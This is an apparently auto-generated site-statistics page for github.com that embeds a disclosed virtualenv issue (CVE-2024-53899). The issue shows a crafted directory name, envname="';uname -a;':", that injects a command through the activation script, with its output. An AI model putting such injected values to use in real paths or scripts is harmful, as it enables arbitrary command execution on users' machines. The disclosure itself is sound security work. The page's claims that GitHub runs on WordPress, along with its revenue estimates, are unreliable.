
GITHUB.COM
Detected CMS Systems:
- Wordpress (2 occurrences)
Title:
Command injection is possible via activation script · Issue #2768 · pypa/virtualenv
Description:
Issue This issue was originally reported to Tidelift, with disclosure negotiated with the maintainer. The activation script in virtualenv is command injectable via a crafted path: envname="...
Website Age:
17 years and 8 months (reg. 2007-10-09).
Matching Content Categories
- Technology & Computing
- Video & Online Content
- Graphic Design
Content Management System
What CMS is github.com built with?
Github.com is powered by WORDPRESS.
Traffic Estimate
What is the average monthly size of github.com audience?
Tremendous Traffic: 10M - 20M visitors per month
Based on our best estimate, this website will receive around 10,000,003 visitors per month in the current month.
How Does Github.com Make Money?
Subscription Packages
We've located a dedicated page on github.com that might include details about subscription plans or recurring payments. We identified it based on the word pricing in one of its internal links. Below, you'll find additional estimates for its monthly recurring revenues.
How Much Does Github.com Make?
Subscription Packages
Prices on github.com are in US Dollars ($).
They range from $4.00/month to $21.00/month.
We estimate that the site has approximately 4,989,880 paying customers.
The estimated monthly recurring revenue (MRR) is $20,957,498.
The estimated annual recurring revenues (ARR) are $251,489,970.
Wordpress Themes and Plugins
What WordPress theme does this site use?
It is strange but we were not able to detect any theme on the page.
What WordPress plugins does this website use?
It is strange but we were not able to detect any plugins on the page.
Keywords
activation, issue, virtualenv, script, quote, strings, ycl, template, verified, mentioned, sign, added, scripts, cve, pypa, command, fix, navigation, code, pull, requests, actions, security, injection, closed, path, envname, linux, execution, downstream, bug, commit, references, ddded, comment, github, projects, milestone, footer, skip, content, menu, product, solutions, resources, open, source, enterprise, pricing, search,
Topics
quote template strings comment metadata assignees activation scripts command injectable execution path activation script famous downstream projects milestone issue originally reported disclosure negotiated crafted path low-risk environment os cve-2024-53899 python 3 milestone relationships github virtualenv sign comment skip jump tidelift maintainer envname= uname mkdir $envname cd users details exploits disclosed maintainers project reference commit references version swatch-3399 bump free join conversation account development branches share
Payment Methods
- Braintree
Questions
- Already have an account?
Schema
DiscussionForumPosting:
context:https://schema.org
headline:Command injection is possible via activation script
articleBody:**Issue**
This issue was originally reported to Tidelift, with disclosure negotiated with the maintainer.
The activation script in `virtualenv` is command injectable via a crafted path:
```bash
envname="';uname -a;':"
mkdir "$envname"
cd "$envname"
virtualenv .
. ./bin/activate
```
```
Linux archlinux 6.10.6-arch1-1 #1 SMP PREEMPT_DYNAMIC Mon, 19 Aug 2024 17:02:39
```
The execution path is low-risk since users clearly know what they are doing. However, it makes *downstream attack vectors* possible. More details on possible exploits of a famous downstream were disclosed to the maintainers of that project and `virtualenv`.
**Environment**
- OS: Linux
author:
url:https://github.com/y5c4l3
type:Person
name:y5c4l3
datePublished:2024-09-23T14:27:10.000Z
interactionStatistic:
type:InteractionCounter
interactionType:https://schema.org/CommentAction
userInteractionCount:0
url:https://github.com/2768/virtualenv/issues/2768
Person:
url:https://github.com/y5c4l3
name:y5c4l3
InteractionCounter:
interactionType:https://schema.org/CommentAction
userInteractionCount:0
External Links (2)
Analytics and Tracking
- Site Verification - Google
Libraries
- Clipboard.js
- D3.js
- Lodash
Emails and Hosting
Mail Servers:
- aspmx.l.google.com
- alt1.aspmx.l.google.com
- alt2.aspmx.l.google.com
- alt3.aspmx.l.google.com
- alt4.aspmx.l.google.com
Name Servers:
- dns1.p08.nsone.net
- dns2.p08.nsone.net
- dns3.p08.nsone.net
- dns4.p08.nsone.net
- ns-1283.awsdns-32.org
- ns-1707.awsdns-21.co.uk
- ns-421.awsdns-52.com
- ns-520.awsdns-01.net